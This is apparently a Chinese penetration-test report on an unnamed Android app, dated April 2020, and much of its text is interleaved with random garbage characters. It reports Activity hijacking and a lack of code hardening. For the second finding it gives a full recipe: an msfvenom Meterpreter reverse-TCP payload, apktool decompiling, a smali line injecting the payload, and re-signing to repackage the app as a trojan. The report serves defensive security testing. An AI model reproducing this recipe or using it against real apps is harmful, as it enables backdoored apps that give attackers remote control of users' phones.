; P, U8 a# G! }7 K7 t" o 8 l& y( ^# L o
2 g/ _7 J3 J* o # |# A' w* g$ w' v2 u$ m4 |

$ N7 a( v% _4 K( \. k& U* Q ! {; b6 F9 I) ? N 文档编号： 7 H9 G4 [/ S& } - o/ ~4 J9 r8 I, k. m" I# Z; N

. G. n8 r0 p6 j- N! d/ l 3 z' s; K& C0 i$ Y& L2 |9 i Z e% u1 I7 {6 s. p6 b& u3 r, j5 } * Q l+ \) e9 i

; H5 i8 j: P$ V1 K 3 f1 O' Y+ D! ?* b S ( w) r* P/ ]; p+ C& o9 [. s 0 S7 t5 |! g* z

) |+ T' ]. c( } ' k) \+ b- h) S6 u* s( }1 v6 }3 ^/ J 5 e1 |# g$ Y( |' V $ x8 f8 a N$ n S

7 z J* D0 X/ @0 Y% J+ ` L) }* S / N# R1 z1 p9 M* P 0 I% R3 Z; w% n5 C( L ( y4 Y3 B. T% _# v

4 ^; ~2 S( D7 [: q' z7 p7 _6 R! l8 ^ 6 s1 E- u4 V, a: W: ^9 ]) g ( ~9 W; Z) h3 K) K! g

* G2 a' b2 F$ @( u2 G6 h; O$ C W 某某某APP渗透测试 6 {6 P' ?/ D0 ~% F1 f: T & ]! Q8 J! e5 G& ~* {

* P b J' R5 s! k4 }0 ] 8 E7 G6 D0 |+ U4 e1 C" a( ] 8 h2 N8 }8 z5 g5 T- o8 a( ^1 d 7 T# L/ |- J2 l5 ~9 K

# f% C( H8 G( L. ?( s , x# x# o: A! J4 H " w, d6 i& c' p0 c5 |# I* \- o! d

5 @* f$ ~$ ^/ u* W, F% _/ B% ` 7 G: V, ?$ Y" P$ [6 l9 w0 J. }6 X$ S: P; S t

! H1 ?' |1 P) V9 h5 w1 y5 } $ X+ T1 B0 b4 y7 W4 F 0 k7 s$ @' s) Y1 p E' K: r- W1 `( ^8 `. {! G

5 l" `: {3 V, g$ g9 u : m) n( P0 r+ S7 U1 O4 w: V8 s 技术报告 ) E2 I; l1 J2 X; e7 ^0 }6 t. w ) \4 \- ] l9 X8 {2 Y) C& _# Q

. X# p( x8 ~. ?, ^ / O; F6 O" F# V5 c4 P ; G6 j8 F8 c! _" D% {8 e. h1 g1 A4 v& f" E* w3 ~3 l- |

2 i8 j& _+ ~/ g4 r8 q2 G$ N7 e: y7 z; q/ S% T 1 u) J% M& ^% J+ t7 b! p; O! d 2 z% [: t& L7 u# _+ a

$ m) C9 Q+ s$ D2 D. r* L+ `9 y8 M8 }( }0 A* \4 f4 \6 a. V! s) k1 a Y - \) _$ o0 Q2 Q! y3 l) ^9 @# P) l, H9 b( f& a

0 h; V0 P& f, b9 P# F. C. X% v " W+ e$ F3 b9 N" N0 Q: x% R6 Z 1 u- [* |; e! H s, M6 y& v% R. B! b

1 Z5 p* ?# K/ y, M2 @ ' A J: `9 P! i/ l2 l; i" O * y- N% |/ F+ {# M: T$ C5 [& T% o. X5 T" n L

' Z- O2 G- O! b5 @7 F1 q 0 X- I' x3 a p+ s! {7 H! O ) ^! \ K- W4 M 5 m7 o9 T$ \% A$ L( Y$ U

) d4 c: C+ I8 M( `9 z Y# r & Z( V' ~2 N( W5 ?, q4 D 0 e U* C( w" X1 C6 @" j7 r4 D) y r$ J " s3 Z6 B) ~' W' d. C& Y+ ~

2 J* R6 d3 R" s& Q ( e% s3 f) a5 p4 g* O+ C: m2 D ; u: y# n4 Y) b$ Z, q+ A! E $ V8 b3 A7 ?" C- s

' _/ B. v1 |- p- u/ }$ Q9 q+ r/ V & }' H- _$ N) j/ O/ B- m O 9 f* b, {5 o2 V, R9 z$ H8 N/ X8 [ s/ X9 P p

$ ?2 m+ c( w" ]" I0 m " F- e- q/ V2 U9 [3 \ 0 b4 E3 G3 b2 c& \4 V$ T) O! f ! k* I+ e/ E! l3 @6 x5 d

0 W: I" ~6 V, U' u4 `7 P G4 p* s- W% a1 z3 ~! V* y. U+ I4 j 7 l5 y8 f- q: z( T$ }4 _. J g / ~, T, I- `/ C/ e6 u2 N

- D& U3 [' l, v. Y( \ % a$ Z) F& V9 `* _0 a- I $ _/ _. l, R7 W2 U ( z1 P# O& J; }, J$ E

8 V" Q% V) r( z D. Z ; P% q" r _- Z% x/ n$ l$ _$ I2 R! j 3 G s6 X, g: s, B ; v( z6 o* N! X: e

0 g5 D' ]/ l5 K7 _) V' a; f$ _5 ^ : J( f% `& Z3 ?$ ~$ R% W% Z8 C : K& g4 A n, r% @; | x- s$ p: o1 B; K, J9 n

* x2 I( e8 A! p' x" E5 e $ G% t$ u9 y* j+ m 8 \: M) O! f4 X8 b. u! p5 j, @& ?3 G c 7 e# t7 V9 ]! @: ^

3 E5 d8 L5 B) D! Q# U7 r; H9 R . P, y6 Y, h/ Y% A3 ^ ! x& }' d8 t" m5 a $ L+ `: n, G& @+ l$ U" H3 |- a

: _6 f/ a3 u+ B. A + ]3 f$ H- c1 y1 ? " ^ d/ O% e/ G/ H/ Q & D& {. x4 G( r$ M# `( Z7 D

+ T) |2 u$ A0 |& E: r l# p 5 L; O$ ?8 h. @0 V" n * ?! x5 ?" V% f/ _ & R7 H: S1 {8 M6 D( {2 w

6 ~$ a' ?8 x, I/ f7 r6 q p7 `5 V, S( q5 r5 o 二〇二〇年 2 T' g+ T5 T+ X- Y9 Y% n9 U ' c$ V2 Q$ A( ]/ p& f. f, V, _

- U5 E* V" b, o$ C# M $ a' G0 R9 s: m) x* g$ P5 @ 目录 , O7 c! @ o) B% l/ R- O' g y; Z# |" h

( g s% x: w0 U1 Y# X# ?' u ) l; h9 Q$ |3 D) E ) V0 o- I. F/ v7 M, d! x+ B * t4 w$ s' m8 S

) R8 Y8 Q4 j9 K 0 l* ]7 i. v7 ~# x 1 概述... 3 1 V# k, @" W. ?: d* E - V3 Q; M7 P, t* L

; E5 w4 l" _" F+ C* U/ b. B) u, I5 {5 {4 C 1.2测试时间... 3 ) z$ `+ J6 j5 ]' [- T3 E* \8 o: ^: t/ l I

3 q$ k7 `& Q3 a0 L; _5 y, |2 L+ @# x6 d# | 1.3测试对象... 3 * Q1 I8 h- U0 A+ `. h7 w; {. A! `6 z4 }

- p% C( ^/ f& f X7 T6 F) m( O " A9 |7 @+ D* H6 n 1.4测试结果... 3 % j2 F) x% Q ]2 c4 L& U 1 |9 M% [, B' q- ] t3 ?; L, k2 S

# d+ _0 g2 X' _& a! J: C" f 5 n( \% R% b3 g- @9 z 2 检测结果... 4 + K1 Q) S+ ]( h. J % |7 I3 O, f4 w$ n3 b3 T! Q6 O

! q$ v8 {* l) n) c0 I4 u% |0 T 5 |+ S% W6 R8 P4 G H) H' q 2.1 某某某... 4 5 n; j0 f: y g( |* S * p) _# O8 S5 ?; S. q

( W' A& a& X2 p 8 ^. o5 e6 X8 m( w. s 2.1.1检测目标... 4 / y' \; a* G! F4 L 5 F; p1 ]# g% b6 s

1 \* Y% B$ |8 x$ g # G& I; Q, N3 i; X2 \ 2.1.2检测结果... 4 5 u' _9 ?% U. p$ P/ |$ c9 P C9 C3 x7 A) G% |" f! g

1 E/ k7 s) N- o' t* W% ]8 b' R ' b8 S& R$ J. n( U6 }7 L: N( a$ Z 2.1.2.1. 4 7 e O% J- k: m1 {+ J 1 q3 Q+ l* D8 I' ~

" E3 V/ V3 X- |+ _. A B 8 A( x3 ~1 i4 j" x: S3 K5 S 2.1.2.2. 6 / z4 [: f: @7 P. _ 6 e- o" w% y$ h; x' Z

; s( y9 W/ `7 ]. q$ q7 c 2 T+ ], x! j0 I# T" [ 5 W* e& f8 v! D1 a% } ' w2 ^; Z9 g. F8 D2 l: T

! |6 h: F8 X, g$ N 6 a9 |" d) ]# x; J0 F' i' J 1 概述 3 k% P7 D( ^& N+ q$ Y 9 Y) J) B9 I% |

8 G0 M# |$ h! e + h1 k* h: c) Q7 d% ]$ |& F 1.2测试时间 7 T4 G: E' v, t) A3 c7 y+ v' K- d4 h9 M2 A

. c+ T$ ? Z' W4 o1 g / c4 l u; W3 A$ h& i . h3 v; G( v6 ~+ K; _1 Y4 U# z2 Q8 s 渗透测试时间 . U7 g% B9 e: }/ k) i0 c 2 ^& d$ `# Q8 K. ? : d2 b. I0 L1 L$ { V8 {3 _$ {$ N4 ` y6 }; ]
( N) o8 P! M: t5 P0 ~ 2 I- P+ A Q+ r6 O " A; J# X) r& \8 B) M, z6 T ! R, ^. `1 n; h- Y6 w5 Z; \ 起始时间 7 R1 z8 [9 y2 m; D$ c # {) A( c+ k- t0 a f! ~# h. i 9 b0 i' X* D7 h1 @ ( K8 z( L/ ~4 `	$ c) q" D% D% T& g $ I# s' t9 N0 `$ \|- `, K; S 8 f' V7 I1 K7 z$ J. ~9 \0 i- P& C( X2 v7 z! l& O 2020年4月6日 & l( u4 k: b; W0 \9 r ]" N* q ( S- j* D) `# \|) d8 M" s: g9 F2 j 1 O. I0 S! [; t. u4 X" @' U / ?5 z5 p) ^. W- v+ M2 ]: @
! }8 k7 m% r) L 1 q n% z8 r7 ?" x 4 t" t2 _! E5 N/ H$ B" O# K' I' m$ m$ y' r 结束时间 2 `+ W7 y* t9 ?5 _% l4 m5 @7 @( L5 n5 V4 U5 u0 b : f; z. D8 p# _% T ) q5 N, K( t7 G" ?0 }4 r1 i	# `& d$ e8 [; f) I $ k# \|! E/ }% B . p0 t+ C E. D U8 \- m2 L% i. l* Z4 a2 e 2020年4月9日 & K$ I+ n& W6 p i" x6 x( F' P2 a! u4 w+ m, I 9 W7 q" w8 D- [* U4 U$ U1 a4 j* [5 i5 ?( h7 m- r( r

4 U2 m' L! _& C: B7 d 2 `0 q0 p. F5 {3 S8 [6 X- X' o 1.3测试对象 * F+ H( k0 c, O5 V- \/ d$ N1 g+ O ) D n2 Z2 A9 ~. d6 h

5 U4 j# n* N+ I- y5 @ h& J5 @! i- C ' y, x9 D5 t) T$ ]3 ]& }$ s 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： * H* F' q3 o( G% L2 ^/ n 8 u% X: U3 t: W0 w4 P+ a! K

7 H$ E- ? V! q* H # [6 l0 ]" D! [, N/ d 表1-1 检测对象 3 f% Q* Y/ u0 j! F3 p' v5 ] ; R! H2 R- N. ~$ A; i

" Y# G3 D0 C( u; y ! e- ]; B1 a, p & ?2 P- r6 p' t4 {& O ! j: }9 ?2 F7 r3 G# n 序号 + y7 P8 Y/ ^" d+ N% M0 L \1 N9 D. s" k" b+ z+ l & p" t6 r; B B4 a# e( u0 \|/ {% M. p& C8 X& Z) m; \|- R	% s5 W6 l$ U! f 7 z0 H: J$ L2 ]) G" J, S4 h7 Y2 i 6 r- b9 D: m G3 g) h( _# k3 h8 e& t0 x8 z/ G5 C- m9 S2 t5 g2 T 测试对象 : ?; U ? {& A" h: v1 z " `! H! G, h# ~! q. d! _8 A: M + t, ~! T* q9 Q3 k: m ? ]- }2 N$ y" j	8 Q1 x# [% R/ j $ y1 Y6 j; F# E2 z & b3 x; @2 q& x" S8 R# p& z1 h . u- A- c3 y7 e% q 测试地址 & d, U* Q9 K: J6 m# A: ?& H+ N , g$ O. k! `/ { } . x+ X/ Z# L3 K' ]9 o 4 X/ j# J/ `% b5 h5 L, ?	. R/ f Z) f+ P2 Y- q' o: } N7 Y e 1 ?5 t! V3 v9 G$ T1 o \1 P6 h, h9 V3 ~1 ?/ i J& f" { 安全漏洞 ' j9 g' H7 {7 Y2 \|9 M" w 9 z( ?' \|8 @/ V" s& V) y& o ! c. [5 x9 f% j 1 e% P1 [5 T% @# e4 O
2 t9 f6 K m) Y. i $ ^+ l J7 S5 ]$ [) t5 G * `$ g# c# T# A$ o3 Q* i 2 f1 C8 h: {6 d! n9 y/ o 1 / W( d7 {$ j7 Z" H# f / Z+ m- P% Z& h% k- i7 ^5 e 5 G$ M3 N* f* r9 U- g) o* Q9 V# E6 o0 E* @2 A5 P' \) T- [! ~	" q) w# \5 C3 { 8 f# l4 z" K7 M" }1 y 0 v& o; o3 N+ P. w+ \|" w ; v# z7 v! f; k1 K, @" ?- R. n 某某某安卓APP " c" u7 @! o, c( g6 m( a1 b/ M \|$ M, e; m* z6 d / N+ Y$ l- ?6 v$ D* e3 I	& K5 x: d5 Z2 }4 D. d - R8 V, w6 _( E1 }- E ^1 ? % k5 W( O( [$ g" {' p: a ! r, f; z' U! ?' J; P8 d A, O ( z5 V/ k& ?9 j# O2 @- J5 D , d1 h8 q* N' i# V$ P/ n; V $ n E4 Q" u2 E0 A 0 \|; z1 F3 i4 z; y6 y	' ]" t/ k+ u* s, ?1 A 2 I! ?6 R, Z6 W * \|/ }3 y/ `1 x* b4 Z/ {+ E) t9 M& J4 M) ~ 2 # ]3 k: ?; q! B! n! a% [, o4 ]3 h0 D0 W; q% T , Q) K4 p3 L% _! W3 f V* o2 G2 }/ \|* ^

7 K8 G0 B8 |" w' Y& V" ~ 5 c+ f% Q2 d: N 1.4测试结果 ( ?* b, d; V: [3 _$ S* L- H % T% c# W7 ?& S( r9 _

4 s S4 V. P; Y$ l3 u% T& b / j) ~( r9 `0 ?* i& }3 q( a/ I 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： 7 P" \& B7 z9 L" C n; _ & S i: A! B* \- V# M! T$ w4 g* T9 q

# e9 w3 O- z3 l % }9 S7 \. v8 C7 N 2 y1 V; h+ ^ A: q& d; D 7 a+ S$ W- i# l8 U) O+ x

8 f6 p' C$ y- i! J" z8 { O7 B& d4 d* w& G4 j 序号 U* u# m2 B; j- d* K( n ' c: b- w e; N# @; L, q

% L1 ~4 X' D Q, \ ( \3 \' v8 d9 o3 f/ i 系统名称 " T" W/ \) K& L4 Z - A% }# f I' t

) o! P# \6 k# Z+ {* Y9 [/ u1 v' P% X . ~5 c, q& l: ^1 x# p0 e$ Y0 e 漏洞名称 ) f0 \- D- L5 Z% T ; b, e6 L' E: Q, i8 P* L5 B) ?* y

, O( j$ G) g' o5 U" c5 ^5 d 0 h% H6 i9 m* C$ W$ }5 H; { 漏洞危害 ' }% a, r, _9 c 4 H" b# ]$ ?' Y5 A' r) f5 O

; L, E/ \/ v* q! ?' E* d7 x# R' o# `' | + b( u4 |( P0 n 修复结果 + b4 e5 \6 H8 n+ i5 {6 z 3 o. w6 t1 G( X5 v( l7 \

' _" [: q' |' ?7 E' e3 }$ _6 F + ~' D, s1 r7 T& H; u/ k" q 1 , A% A5 _4 c- s- z 5 k0 z5 r2 S/ N3 s5 {0 a" R3 t

* J7 W6 a& U/ F8 k) x 9 A8 c4 k3 e( x( O- h6 x 某某某某某某APP + V; F u/ K" A- F7 [8 ?# r6 T" c X5 A* A" f

6 e% O: q9 q9 I ' ?2 Y! x' N, }# w. @* l( e+ Q Activity 劫持 ) \( u; S. l, p6 G# I( g9 D! e& p* s ! o+ M/ ~% E( e/ V5 y: _2 q

6 \1 A# u# c) m* p( F) S1 P6 x- U3 r0 Y' B% r* h1 D( z1 F2 Y) F 0 o* f2 u" Z, r0 h5 Q6 h " _, N( h2 S* s0 w6 R/ R

$ G' i1 n q% c* E& D+ Z6 E d2 ?: P5 Z 高 , U" U0 r1 N1 C1 z1 l: P 5 P8 {0 ^- T7 g5 S

5 F5 l% P: g/ x! K : p7 ]) y) H) Z2 z) O) m' T * n* R1 G/ t/ J: V# O) ] j/ m' s * P3 l6 j" u2 y; Q. R

+ M- A {8 k: Y ' M9 Y5 z j Z$ P* O9 t. f( S 2 % L0 l( W' |1 u8 y p( }6 `9 j8 h4 Q% R. y* e' y

, d4 J( G$ ?7 j4 a9 E1 P1 r8 j 2 s+ e0 F7 p2 w' [5 T. u 某某某某某某APP 1 J9 [# |8 j# ~$ ^" Q7 C/ {# D/ F H- P

. L6 E" _ a/ u- b n+ b8 u; l % S$ ^0 ~* t) \2 t9 j ]4 `1 G 反编译二次打包捆绑木马、篡改APP代码 6 |1 ^/ w ~8 o2 W4 Q* `0 K3 `1 t( C- P- R

r. x% b$ ~; c8 ~ g/ j $ e# ]9 j1 Y) T6 f3 H& |- y 高 $ a/ ~5 C, U2 x& p! }8 P ?) \( i; d! h. Q3 M

Q7 [* I1 U9 v* e. T1 C; z. \# c: c8 w4 M) h 6 O: N) D* k# v Q& @9 |4 I2 n+ Y( n+ C% V

$ \" r: m7 _5 g ! q" D6 v; ]5 u& D1 N% T t. M: G . f! p/ y |* E1 K/ [% ]* B4 j) w G5 J. K% R6 ^8 @) A$ d4 x

) W2 K% j- {$ L) D7 E8 u * I5 J* G$ x! \ 表1-2 测试结果 * \, ]/ ~* I$ F0 o: h4 s% @3 t ( `; R* u( ?# h( S( I' |

8 A; j+ V1 |1 Y# Y ' V6 W4 t! o$ [1 `7 v8 V B W + A7 D- a4 W1 J) v( {/ h& J, F ' g: z+ f8 a; E, K7 k/ v. d

3 z/ e. P5 H3 i3 M# l' m) _4 z 0 u& X0 a* \# T5 o. i9 e2 R 2 检测结果 O% S7 s4 `" T- R1 l9 d% f) z$ i* Q- G H. i

1 o: p/ Y0 S& O/ N8 q 8 b& o" w7 D9 q/ J; t' |, L+ C# J 2.1 某某某 ) O) R4 z: C4 s, T0 n- Q$ h( u, R2 E! x- M- E

- K# Q! s" L. f/ D0 @ $ u& u5 c t6 L$ k 2.1.1检测目标 . x) B% |3 z2 v2 \$ h+ c! K, J8 ~* ?. c8 R$ \/ O$ v

3 G. O% i. n: Q3 W6 O/ s % W4 X4 U9 D! H0 e1 \ 目标地址： 某某某某某某APP 4 k9 W" `/ }8 j4 k " |! t! }6 h( P$ \' ?5 i; }1 @

9 p+ ^9 V; K& X! |# ~4 c x9 A* q+ Z, r# o" U. S" b F3 r' C 2.1.2检测结果 n4 U/ q2 f7 Y9 u! M% [9 K+ n3 B5 `& O ( V9 I) ?: l: E2 }: _) |

& d# H# \2 ~! Z' m6 F0 ~ ) R1 P1 W1 l* A' G2 u 2.1.2.1 ; ^3 f S: ?2 t( R& x/ @( K; L/ V. b4 p! ]( \

7 {8 W+ M5 T, z& Y; ` m" o% O5 `4 D. _/ g/ } 漏洞链接地址：某某某某某某APP + C; Q# l; K$ ^4 _3 f" O, [ 2 b) J. R6 e! F' L( `% E

; d# J5 G3 j% c 2 H8 r* N* @2 {% P$ [, R) f' d 4 r, v$ |; F* L# M) k' e! x & k( z5 E) i2 w' Z

& G/ ]' x, b# C" l: ^ `6 F5 Z: [ [8 l7 T 漏洞分析及取证： ) p5 \( T1 y! K! R W( A 7 r) f; F" l) q+ Q+ I

& [; c, f+ x2 ^1 a8 M* ^, A/ B ( L+ \3 k( ~' L/ B 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： % H: m3 F7 Z* i R: L 8 C2 x1 l5 D3 X% z

( t( y$ z1 d I) \" `1 m* @0 ]) o$ ]* `: u3 Q; g9 U# \4 { 2 [5 u* `) [1 D2 n6 L5 g + g3 ^! ]% \2 ~/ \- w# K

4 g& f0 ?; e8 i+ A g3 E/ G! x) Z* Q % E# [3 r! G5 d; o: [ 7 O4 f* ]8 q* k2 S- w

1 V4 G2 h% S) \* S! _: I: O 7 h: R5 M* G; `! S5 q . g& f8 I# o; Y0 F, V+ _ 2 [( O7 \$ p# m. t2 h

) }' M9 L5 E M7 S$ q2 @ ?8 _: H4 m; `/ ? $ ~( h2 L$ }% }# o9 I; T ( Z3 D9 r6 r% F8 n5 v

9 `; |. s7 R, u6 r. w6 B 4 ^- Y* i# i1 h5 K # Q' {$ c1 j; c$ s # G4 Y! o/ f5 [! g7 t

) |/ `- j$ p% V* z; Z( Z 4 N" B) m: [) d3 o 漏洞危害：高 1 U, C5 w" s4 y 3 [- ^9 E2 _: x/ B" U0 U

( y- I1 G% l$ L% v( @ 2 W9 K* L, D2 ^7 Y% L& z, C3 \; c4 l : [ I# U1 V7 c# D- ?; S& n, K5 v- R" s$ z+ C) ~9 w' P 严重程度 % ^- @1 j" u; H' R% K 8 [6 Q; l5 E8 u. B+ Z& j( S+ }6 b & ]& z9 g5 {1 K: D7 Z h( E 3 D+ m' {. n+ Z* m- {	. V) n' l1 X4 z 7 l; n( s( B+ _* Y) M) L$ ` 4 K3 Y; }3 j, t( v8 S$ y- g$ M 4 \, U+ M* e8 a$ Q/ l8 H 高 9 @/ v/ w$ V& d( b% O ; ~, Q8 ]7 \; y 6 g, u z' m1 n' n: T$ L - m: M+ D6 K' i" h	+ j9 a% {7 n- Q: N & C3 W) J2 c* j& [% I # p2 X4 p$ n4 \|* s; f0 \| - W" \|) g) U' c8 @; {+ \ ■ % q ^* l8 j% s3 c ' a- O* S d; `; b+ C6 _% x # ?/ d K! x8 q G4 \ : M$ N( M) n& P4 g+ i	+ t: }9 {1 I; T% J) Q+ N, a' d0 A / A5 m3 m7 r( @+ J X' C 9 M: b1 f6 Q( R( r8 c' m/ p) q+ D8 p6 T4 V' n" P- G 中 1 E4 I6 T) d( F% V1 `4 D5 m0 n, o , X+ k5 `: e& a! \| 8 q; W9 {8 x8 s7 c& d - z: h- C+ K5 K ] E. r5 F# d	! e& n$ O, H& ~ . L0 E9 ?$ f3 \! p! r7 J ) }+ t% \|: Z. H! f 5 O& j9 b' O2 E* a1 } / A& h9 t, I$ E( G6 x, B) c ; K; `9 B, ?0 T% Q( \ 3 Q" B6 {! f$ {+ X' A/ a$ D9 P: w$ S5 b	: P5 s1 S; r$ v ) b+ r) s; N& \& Y * b, W) w6 ~. \|' Q: [- B, [0 M3 Y }, H0 y' s$ a W2 p 低 : u0 ^2 y) }- ]. b8 e: h * ]$ d1 }* m* S5 w; m/ K5 k' ` ( [- h7 A6 P8 [- w # t3 k# V* ]" l1 l	# }( e# \% E# n$ ~ / c- Q0 D$ k/ X! ] ( C, \" I3 Z$ Y. ]3 T; l3 o: l - X* e& `2 }# C1 W3 b% D2 V4 M / D" ?5 \" h' u4 w% ?! x8 f ; [. O6 R; g: \|$ ?$ M3 f' o : }; \|! E% W% `9 u5 w4 H+ d6 r$ J, k1 f

0 L2 p Z6 }3 J$ X 8 c' F2 ]! _, _1 N t4 z S: c K0 b5 K2 ]5 R/ t: n + c f. r% Z, w6 w) h% `

9 K4 X4 Q( c) x : ^' L0 b. x5 W2 ^ 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 8 F B0 ]9 `6 L6 |. p" K& d2 d + K8 I7 q9 s# ], y9 q" _; _

" x, c7 p3 Q( S z0 O4 o2 Y9 A" L# g/ o. k# l ) Z( J. H. F* I! \9 s & E0 i/ d4 ^ C) K

0 B. ?, [8 m# |& j % O1 T' Z* h: H 1 A8 r- a$ u9 P. x1 c/ ^ # i( ]# V, {7 o) Z. y* V

9 O. H/ f- m& j7 b , y4 _. L2 _5 O- ] 2.1.2.2 5 ^2 J5 I( o3 q( l" C& `8 n+ h4 M4 H! w; C

6 y3 v7 J, j! H0 \% Q& z9 t$ a+ b , ?7 ?6 F! E3 O, D2 C% e% P6 e* }. V 漏洞链接地址：某某某某某某APP 4 @' b- g: S4 v/ G" p & l9 I% J [: x" A/ a

+ V- O. ?- P* F7 h2 a2 [ / o2 G8 Q3 I( v1 t7 Y: B" M 漏洞分析及取证： / G. u3 K# R# c9 T* f1 t' V 9 ~3 K/ e( |# [6 `7 X: e0 D

( y( U6 K1 C. X$ D. ]2 M6 B9 P, P 6 M9 w8 ?$ U3 F2 _+ |9 O# o3 y 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： / k! t* t2 M0 B# y' `9 D4 T & j1 F# q" H; m, e4 E6 F

1 `% G) `3 Q$ J1 ?3 v ) N9 K. X/ \0 c9 t- s3 g 用Metasploit 生成木马 apk / |: F3 I H0 o7 |# G. R( {7 E) U . ~+ V, ]& X8 ~

+ d% W. V& E3 e: {1 h0 v* B+ }" V! {/ Y3 h# I3 i msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 8 S" \% {2 ]9 h3 _( } % X5 _1 i5 [2 C1 N$ k" K7 J2 V

% j0 ^) S7 K, k5 Z( G* {7 h: K% H2 p% z: m: M+ Z( l, [; a) y 反编译目标apk和木马apk ! |% r7 m' l% W8 p5 G1 R- k+ r; Q. d6 D

5 }2 f+ M! b+ I# H' T# O' l8 _9 Q5 Z v6 h apktool d target.apk
5 h; x+ r! j8 p7 w, U/ K1 ~+ P2 ~ a0 N* e apktool d cockhorse.apk $ L/ e; a) w$ F9 w" t) K! Q+ S1 r0 i- I M( w% r

@ v7 f: ]$ q& h0 t # V5 a/ R' [% J7 |% e! Y 木马 apk 注入目标 apk " w" T6 h9 V: n/ r $ c' U, k0 P3 u9 k

+ [/ D# K$ `; v$ l3 M l: |' ^! d 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
- `! H9 |9 K: ]6 S ) z: h* J9 X! l$ W% w# Z" V invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V / T; E3 Z6 G- c" G6 q- {! h6 n: w6 g; ]7 I' j# w( H

* T# O- @2 X, p+ p2 H$ H 1 d: g( G; B! P6 Q5 V5 W 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 2 d/ e4 Y& Y0 j% I+ Y ( a2 d0 V S/ @9 C$ `" Z! a3 H

. l$ D$ I: B1 a- v ! \& V; q6 E# G4 N 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 : q! n5 ^! Y0 o ( K q5 p5 Z( b" e

" n1 p0 i4 U/ ]/ x0 V& v # t) e2 k0 o- s' P 回编译生成最终 apk & X* R+ X$ `4 S5 M6 [ : X5 G6 K7 ~* Z

& t/ r) ?; a' \3 `: ]. `: u % W' q" Z) y& `2 I4 g 重新打包 $ _) B, f) ]; [4 }; M$ M) |2 K4 {; s3 d# G+ W

% m% {! _6 v1 o% r0 _' E8 Z : S0 ~; C. N2 I# a apktool b -o repackage.apk target_app_floder g0 L( D' H# M4 d- G# ^. w! _* ?% o q, J* \

8 H* |8 E( T4 H0 j0 G, r( L- a* s- T: Y 创建签名文件，有的话可忽略此步骤 ; o$ U; A/ g Y; d9 q4 m , t, M0 H" H( J/ `$ l

# O: B' E0 u+ z " i# }" R! _- k0 V1 ?7 J keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 8 V$ t# h3 z: w5 m 2 n2 _2 c/ ~- w( W

) e6 S$ J. h; i: @ % D" h v% r& U 签名，以下任选其一 ( k5 m0 R; K6 ?: a2 J1 }' m * C3 h/ ~9 w/ F4 P& h2 G

# l2 v9 n4 i$ [ y" }, L / [5 e3 H$ ~' K jarsigner 方式 0 x. t7 r3 v1 P 4 L0 V9 t# O( F* m; ~& o3 l/ R

7 E+ y0 Z* q# m# [- }3 ]+ @ 4 B Q4 E) o+ ]8 u/ _8 p jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname * S5 i& Q3 g+ |, x0 m / M _4 h0 g ` E5 Q, x* F

6 h Q3 T+ n) J' P* v6 @; R- j 7 ]' l3 M# h7 C- ^! e apksigner 方式 # a0 L) u: j' s9 A- f& Y' h 6 P) D( V' H* u' _

; o' S1 g! _) i; J1 S) P ! ?5 {7 L* a9 \% T apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ( ]% }& j6 M- ]4 b: L ( a" b& ]' y! D1 I6 H1 H- q$ `

- U% n# \9 o7 y8 `7 A; J 6 q5 l& A$ y1 b8 n: f; q: ^ 如需要禁用 v2签名 添加选项--v2-signing-enabled false * r, E* h3 |" \) ?# Z" e# F. ?2 ?6 G w. c( m R

5 w( U$ c# b( Y# C% t/ { # N9 k1 F# c8 w0 n 验证，以下任选其一 - H& r* ~: \ ^7 O4 j% q2 c - [/ `# N/ F( {: `' u

% ~4 W) s" L; ?5 L9 T2 [/ M/ {8 d 2 O& \3 e& K P1 F) @! {7 `9 o jarsigner方式 $ s, \. k4 V, z7 U( H k% Q3 k( S" n" S

3 M! f8 a9 w6 U% O' Z2 N; W , Z) V% P% m/ G) W jarsigner -verify repackaged.apk / D( Z2 z4 o1 W! @, s & i8 t5 m- z; f5 x: ]* C

2 b! E0 A# L3 T! X9 p! K8 j3 Z% {: L2 G$ J! C# j e, G2 | A apksigner 方式 " a7 R5 r% \( \( B8 A" j2 o2 _ : B& A1 N& W" ?, `/ \

! x0 N/ w: m" l$ Y: `: w a" U0 {! v0 z! {! \6 f apksigner verify -v --print-certs repackaged.apk 6 E6 r8 _" {. Y& } g5 u1 H( o( O) `$ \+ T9 t0 }+ g

5 ?2 ?, y$ J4 G% z, u . Z9 n3 i9 c6 V9 r5 J keytool方式 6 A- ~3 r( ]% V # `& w3 G& c% \9 K

2 I1 A- k: `1 X d7 f$ Z, q 1 f2 }+ G, S/ V) d keytool -printcert -jarfile repackaged.apk . I% P1 Y. B" s | 3 @ y6 S# U7 A0 {/ n

2 y7 d3 Q5 b* a S- f+ t + ?5 Q+ b- I! l, i- v5 M+ g( z 对齐 0 G! q t+ t' r. |1 D8 k. l& @: Z% b5 F W) B( H& D% O

! O! Z0 U. |6 w 5 x) }4 P# H6 @. Y4 Y( h 字节对齐优化 8 O2 A: D& V. E% s 1 t" a$ Z4 G) h: A [3 ]8 p! v' w

, x. }5 l4 h7 z, k' _1 X9 y) @- C. s* O/ O# K: Q zipalign -v 4 repackaged.apk final.apk 7 S. |$ K- a0 h6 d9 b$ @ " W) V) Y% b7 d! e( E

